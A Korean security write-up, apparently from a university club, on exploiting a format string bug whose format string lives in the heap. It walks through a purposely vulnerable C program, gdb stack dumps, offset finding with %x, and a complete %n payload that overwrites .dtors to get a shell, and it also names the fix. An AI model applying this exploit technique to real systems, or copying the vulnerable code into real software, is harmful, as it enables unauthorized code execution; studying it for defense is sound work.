힙영역에서의 FSB 고찰 1
passket@argos.or.kr
http://www.argos.or.kr
-----------------------------------------------------------------------------------------

힙영역에서 fsb가 문제인것은 힙영역은 0x08의 메모리로 시작하는데 printf의 stack 포인터는 0xbf로 시작하는 곳부터 0xc0로 시작하는 곳으로 간다는 것이다.
이러니 힙영역에서 fsb가 발생하면 어쩔 수 없다.
하지만 프로그램내에 stack 메모리가 있다면 사용할 수 있다.
다음은 취약한 코드이다.

[passket@home test]$ cat test.c
#include
#include
#include

int main( )
{
    char *heap_buf;
    char stack_buf[32];

    heap_buf = (char *)malloc( sizeof( char ) * 20 );
    scanf( "%s", heap_buf );
    scanf( "%s", stack_buf );
    printf( heap_buf );
    printf( "\n" );
    return 0;
}
[passket@home test]$ ./test
%x%x%x%x
asdfeieieie
bffff0c040015bd44001638066647361
[passket@home test]$

보다시피 fsb취약점이 있고 메모리는 힙영역에 있다
취약점의 원인은 사용자 입력을 그대로 포맷 문자열로 넘기는 printf( heap_buf ) 호출이며, printf( "%s", heap_buf ) 로 고치면 사라진다. 또한 두 scanf( "%s", ... ) 모두 길이 제한이 없어 20바이트 힙 버퍼와 32바이트 스택 버퍼를 넘쳐 쓸 수 있다.
우리는 stack영역에 있는 메모리 stack_buf가 있으므로 그안에 주소를 넣은뒤에 printf의 스택포인터가 그곳을 가르키게 하여 원하는 결과를 얻을 수 있다.
일단 gdb를 통해서 필요한 정보를 얻어보자.

[passket@home test]$ gdb ./test
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) disass main
Dump of assembler code for function main:
0x08048390 <main+0>: push %ebp
0x08048391 <main+1>: mov %esp,%ebp
0x08048393 <main+3>: sub $0x38,%esp
0x08048396 <main+6>: and $0xfffffff0,%esp
0x08048399 <main+9>: mov $0x0,%eax
0x0804839e <main+14>: sub %eax,%esp
0x080483a0 <main+16>: sub $0xc,%esp
0x080483a3 <main+19>: push $0x14
0x080483a5 <main+21>: call 0x80482a0
0x080483aa <main+26>: add $0x10,%esp
0x080483ad <main+29>: mov %eax,0xfffffff4(%ebp)
0x080483b0 <main+32>: sub $0x8,%esp
0x080483b3 <main+35>: pushl 0xfffffff4(%ebp)
0x080483b6 <main+38>: push $0x80484a8
0x080483bb <main+43>: call 0x80482b0
0x080483c0 <main+48>: add $0x10,%esp
0x080483c3 <main+51>: sub $0x8,%esp
0x080483c6 <main+54>: lea 0xffffffc8(%ebp),%eax
0x080483c9 <main+57>: push %eax
0x080483ca <main+58>: push $0x80484a8
0x080483cf <main+63>: call 0x80482b0
0x080483d4 <main+68>: add $0x10,%esp
0x080483d7 <main+71>: sub $0xc,%esp
0x080483da <main+74>: pushl 0xfffffff4(%ebp)
0x080483dd <main+77>: call 0x80482d0
0x080483e2 <main+82>: add $0x10,%esp
0x080483e5 <main+85>: sub $0xc,%esp
0x080483e8 <main+88>: push $0x80484ab
0x080483ed <main+93>: call 0x80482d0
0x080483f2 <main+98>: add $0x10,%esp
0x080483f5 <main+101>: mov $0x0,%eax
0x080483fa <main+106>: leave
0x080483fb <main+107>: ret
End of assembler dump.
(gdb) b *main+77
(gdb) r
Starting program: /home/ar_01/passket/sources/test/test
AAAA
AAAA

Breakpoint 1, 0x080483dd in main ()
(gdb) x/100x $ebp-100
0xbffff704: 0x080484a8 0xbffff724 0x00000000 0x420601e0
0xbffff714: 0x42130a14 0xbffff768 0x080483d4 0x08049610
0xbffff724: 0xbffff730 0x40015bd4 0x40016380 0x41414141
0xbffff734: 0x00000000 0x42015481 0x0804830e 0x42130ef8
0xbffff744: 0x42130a14 0xbffff758 0x0804828d 0x42130a14
0xbffff754: 0x4000c660 0xbffff768 0x08049610 0x42130a14
0xbffff764: 0x40015360 0xbffff788 0x42015574 0x00000001
0xbffff774: 0xbffff7b4 0xbffff7bc 0x4001582c 0x00000001
0xbffff784: 0x080482e0 0x00000000 0x08048301 0x08048390
0xbffff794: 0x00000001 0xbffff7b4 0x080483fc 0x0804842c
0xbffff7a4: 0x4000c660 0xbffff7ac 0x00000000 0x00000001
0xbffff7b4: 0xbffffc1c 0x00000000 0xbffffc42 0xbffffc5c
0xbffff7c4: 0xbffffc6c 0xbffffc77 0xbffffc85 0xbffffc95
0xbffff7d4: 0xbffffcb8 0xbffffccb 0xbffffcd8 0xbffffe9b
0xbffff7e4: 0xbffffefa 0xbfffff17 0xbfffff23 0xbfffff48
0xbffff7f4: 0xbfffff5d 0xbfffff6e 0xbfffff87 0xbfffff8f
0xbffff804: 0xbfffff9f 0xbfffffc1 0x00000000 0x00000020
0xbffff814: 0xffffe000 0x00000010 0x0183f9ff 0x00000006
0xbffff824: 0x00001000 0x00000011 0x00000064 0x00000003
0xbffff834: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffff844: 0x00000006 0x00000007 0x40000000 0x00000008
0xbffff854: 0x00000000 0x00000009 0x080482e0 0x0000000b
0xbffff864: 0x000001f4 0x0000000c 0x000001f4 0x0000000d
0xbffff874: 0x000001f4 0x0000000e 0x000001f4 0x0000000f
0xbffff884: 0xbffffc17 0x00000000 0x00000000 0x00000000

[passket@home test]$ ./test
%9x%9x%9x%9x%9x
AAAA
bffff040 40015bd4 40016380 41414141 0
[passket@home test]$

찾아보면 printf의 스택포인터가 어디서 부터 증가하면서 메모리를 뽑아주는지 찾을 수 있다.
위의 덤프결과로 확인하면 printf의 스택포인터는 0xbffff724부터 4씩 증가한다.
그리고 stack_buf의 시작주소는 0xbffff730 부터이다
따라서 %x를 3개 입력한뒤에 printf의 스택포인터는 stack_buf의 시작 주소를 가르키고 있다.
이제 공격해보자

[passket@home test]$ ./test
%9x%9x%9x%9x
AAAA
bfffe840 40015bd4 40016380 41414141
[passket@home test]$

정확히 stack_buf에 입력한 문자열을 찾았다.
이제 공격만 남았다.
stack_buf 에 값을 바꿀 메모리의 주소를 넣어주고 heap_buf에 포맷스트링을 넣어 원하는 메모리의 값을 변조할 수 있다.

[passket@home test]$ ./egg
Using address: 0xbfffddc8
sh-2.05b$ ./env
0xbffff2f3
sh-2.05b$ objdump -h ./test | grep .dtors
18 .dtors 00000008 08049590 08049590 00000590 2**2
sh-2.05b$ ( printf "%%8x%%8x%%8x%%62171c%%n%%52492c%%n\nAAAA\x94\x95\x04\x08AAAA\x96\x95\x04\x08" ; cat ) | ./test
(중략)
ps
PID TTY TIME CMD
8338 pts/2 00:00:02 bash
8651 pts/2 00:00:00 egg
8652 pts/2 00:00:01 sh
8656 pts/2 00:00:00 sh
8657 pts/2 00:00:00 sh
8658 pts/2 00:00:00 cat
8659 pts/2 00:00:00 ps
exit
sh-2.05b$

쉽게 쉘을 얻을 수 있다.
그외에 환경변수나 argv를 이용하는 방법을 생각해 볼수 있으나 요즘 프로그램은 랜덤한 위치에서 스택이 시작하기 때문에 같은 쉘상에서는 실행할때마다 위치가 같은 환경변수나 argv와 printf의 스택포인터의 차이가 매번 달라지기 때문에 이용하기 어렵다.
그외의 방법을 생각해봐야겠다.